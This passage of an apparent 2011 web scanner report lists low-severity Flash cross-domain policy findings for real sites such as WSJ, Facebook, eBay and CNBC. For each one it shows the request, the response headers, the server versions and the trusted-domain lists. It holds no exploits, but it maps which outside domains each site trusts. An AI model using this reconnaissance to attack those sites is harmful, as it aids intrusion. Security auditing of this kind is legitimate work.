<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.94. http://oc.creditcards.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://oc.creditcards.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: oc.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:16 GMT
Server: Apache
Last-Modified: Fri, 20 Feb 2009 18:56:12 GMT
ETag: "58c142-e3-4635e34dfcb00"
Accept-Ranges: bytes
Content-Length: 227
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.imgsynergy.com" />
<allow-access-from domain="*.creditcards.com" />
<allow-access-from domain="*.netfiniti.com" />
...[SNIP]...

4.95. http://online.wsj.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://online.wsj.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: online.wsj.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:22:19 GMT
Server: Apache
Last-Modified: Tue, 17 May 2011 13:55:25 GMT
Accept-Ranges: bytes
Content-Length: 3647
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=34
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.doubleclick.com"/>
    <allow-access-from domain="m.doubleclick.net"/>
    <allow-access-from domain="*.dowjonesonline.com"/>
    <allow-access-from domain="www.dowjonesonline.com"/>
    <allow-access-from domain="a.marketwatch.com"/>
    <allow-access-from domain="*.marketwatch.com"/>
    <allow-access-from domain="www.akamai.com"/>
    <allow-access-from domain="*.akamai.com"/>
    <allow-access-from domain="www.wsj.com"/>
    <allow-access-from domain="*.wsj.com"/>
    <allow-access-from domain="s.dev.wsj.com"/>
    <allow-access-from domain="idev.online.wsj.com"/>
    <allow-access-from domain="s.wsjsat.dowjones.net"/>
    <allow-access-from domain="s.s.dev.wsj.com"/>
<allow-access-from domain="reno.wsjqa.dowjones.net"/>
    <allow-access-from domain="*.online.wsj.com"/>
...[SNIP]...
<allow-access-from domain="quotes.wsj.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="public.wsj.com"/>
    <allow-access-from domain="*.public.wsj.com"/>
<allow-access-from domain="www.barrons.com"/>
    <allow-access-from domain="*.barrons.com"/>
...[SNIP]...
<allow-access-from domain="idev.online.barrons.com"/>
    <allow-access-from domain="*.online.barrons.com"/>
    <allow-access-from domain="online.barrons.com"/>
    <allow-access-from domain="public.barrons.com"/>
    <allow-access-from domain="*.public.barrons.com"/>
    <allow-access-from domain="*.aol.com"/>
    <allow-access-from domain="*.brightcove.com"/>
    <allow-access-from domain="creatives.doubleclick.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="wsjdigital.com"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.piclens.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dowjones.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="online.s.dev.wsj.com"/>
    <allow-access-from domain="quotes.s.dev.wsj.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="polls.s.dev.wsj.com"/>
<allow-access-from domain="blogs.s.dev.wsj.com"/>
<allow-access-from domain="triplewebdesign.com"/>
<allow-access-from domain="ingyournumber.com"/>
   <allow-access-from domain="*.ingyournumber.com"/>
<allow-access-from domain="*.issuu.com"/>
   <allow-access-from domain="static.issuu.com"/>
    <allow-access-from domain="professional.s.dev.wsj.com"/>
    <allow-access-from domain="*.dartmotif.com"/>
    <allow-access-from domain="wsjradio.com"/>
    <allow-access-from domain="*.wsjradio.com"/>
    <allow-access-from domain="www.wsjradio.com"/>
    <allow-access-from domain="*.eyereturn.com"/>
<allow-access-from domain="fxtrader.l.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.f.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.s.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.dowjones.com"/>
    <allow-access-from domain="dowjones.visualla.com"/>
<allow-access-from domain="*.smartmoney.com"/>
<allow-access-from domain="*wsj-asia.com"/>
<allow-access-from domain="*.wsj-asia.com"/>
...[SNIP]...

4.96. http://optimized-by.rubiconproject.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:07:29 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

4.97. http://p.opt.fimserve.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://p.opt.fimserve.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: p.opt.fimserve.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"695-1261547040000"
Last-Modified: Wed, 23 Dec 2009 05:44:00 GMT
Content-Type: application/xml
Content-Length: 695
Date: Thu, 16 Jun 2011 11:22:23 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspacecdn.com" secure="true" />
...[SNIP]...

4.98. http://pagead2.googlesyndication.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Wed, 15 Jun 2011 20:36:10 GMT
Expires: Thu, 16 Jun 2011 20:36:10 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 53407

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.99. http://quote.cnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://quote.cnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: quote.cnbc.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Fri, 17 Jun 2011 10:11:48 GMT
Via: 1.1 C aicache6
Content-Length: 245
X-Aicache-OS: 64.210.194.151:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Sat, 18 Jun 2011 10:11:49 GMT

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.100. http://rd.rlcdn.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://rd.rlcdn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rd.rlcdn.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 500
Last-Modified: Wed, 15 Jun 2011 22:47:32 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.casualcollective.com" />
<allow-access-from domain="*.tubemogul.com" />
<allow-access-from domain="*.inplay.tubemogul.com" />
<allow-access-from domain="*.grooveshark.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adotube.com" />
...[SNIP]...

4.101. http://rover.ebay.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://rover.ebay.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rover.ebay.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
last-modified: Wed, 27 Oct 2010 13:21:58 GMT
Content-Type: application/xml
Content-Length: 3890
Date: Thu, 16 Jun 2011 18:17:05 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ebay.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.au" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.at" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.be" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ca" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.cn" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.hk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.in" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ie" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.it" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.my" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ph" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.pl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.sg" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ch" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebayrtm.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebaystatic.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.verve8media.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.westernfreight.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ru" secure="false"/>
...[SNIP]...

4.102. http://search.cnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://search.cnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: search.cnbc.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:27:24 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Mon, 18 Oct 2010 20:53:56 GMT
ETag: "f5-492ea5fe9c100"
Accept-Ranges: bytes
Content-Type: application/xml
Via: 1.1 aicache6
Content-Length: 245
X-Aicache-OS: 64.210.194.247:80
Connection: Keep-Alive
Keep-Alive: max=20

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.103. http://soundcloud.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://soundcloud.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: soundcloud.com

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml
Last-Modified: Thu, 09 Jun 2011 13:23:09 GMT
X-Cacheable: YES
Content-Length: 591
Date: Thu, 16 Jun 2011 19:27:37 GMT
X-Varnish: 2254819398 2254760400
Age: 92
Via: 1.1 varnish
Connection: close
X-Cache: HIT
Vary: Accept-Encoding

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="soundcloud.com" />
<allow-access-from domain="*.soundcloud.com" />
<allow-access-from domain="sandbox-soundcloud.com" />
<allow-access-from domain="*.sandbox-soundcloud.com" />
...[SNIP]...
<allow-access-from domain="*.soundcloud.dev" />
<allow-access-from domain="a248.e.akamai.net" />
...[SNIP]...

4.104. https://soundcloud.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://soundcloud.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: soundcloud.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 19:28:28 GMT
Content-Type: text/xml
Connection: close
Content-Length: 591
Last-Modified: Thu, 09 Jun 2011 13:23:01 GMT
Vary: Accept-Encoding,
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="soundcloud.com" />
<allow-access-from domain="*.soundcloud.com" />
<allow-access-from domain="sandbox-soundcloud.com" />
<allow-access-from domain="*.sandbox-soundcloud.com" />
...[SNIP]...
<allow-access-from domain="*.soundcloud.dev" />
<allow-access-from domain="a248.e.akamai.net" />
...[SNIP]...

4.105. http://static.ak.fbcdn.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.182
Date: Thu, 16 Jun 2011 11:22:40 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.106. http://w.sharethis.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://w.sharethis.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: w.sharethis.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 15 Jun 2011 21:11:18 GMT
ETag: "36321-14a-4a5c697ef6980"
Content-Type: application/xml
Date: Thu, 16 Jun 2011 10:50:59 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

4.107. http://www.cnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 16 Jun 2011 11:24:40 GMT
Via: 1.1 C aicache6
Content-Length: 3839
X-Aicache-OS: 65.55.53.237:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Thu, 16 Jun 2011 11:25:41 GMT

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
...[SNIP]...
<allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.atdmt.com"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.108. http://www.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.62.180.44
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.109. http://www.homedepot.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.homedepot.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Thu, 16 Oct 2008 20:46:36 GMT
ETag: "1023-1c7-f1d96300"
Accept-Ranges: bytes
Content-Length: 455
Content-Type: text/xml
X-Pad: avoid browser bug
Cache-Control: max-age=43156
Date: Thu, 16 Jun 2011 11:27:12 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.homedepot.com" />
<allow-access-from domain="homedepot.com" />
...[SNIP]...

4.110. http://www.res-x.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.res-x.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.res-x.com

Response

HTTP/1.1 200 OK
Content-Length: 217
Content-Type: text/xml
Last-Modified: Fri, 22 Jan 2010 01:35:21 GMT
Accept-Ranges: bytes
ETag: "fe71562939bca1:bde"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 16 Jun 2011 11:31:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.warnerbros.com"/>
</cross
...[SNIP]...

4.111. http://www.wtp101.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wtp101.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/xml
Date: Thu, 16 Jun 2011 13:06:14 GMT
ETag: 1300114347320
LastModified: Mon, 14 Mar 2011 14:52:27 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 320
Connection: Close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.adap.tv"/>
<allow-access-from domain="*.nieuwefabia.nl"/>
<allow-access-from domain="*.denieuwefabia.nl"/>
...[SNIP]...

4.112. http://citi.bridgetrack.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://citi.bridgetrack.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: citi.bridgetrack.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 508
Content-Type: text/html
Server: Microsoft-IIS/7.0
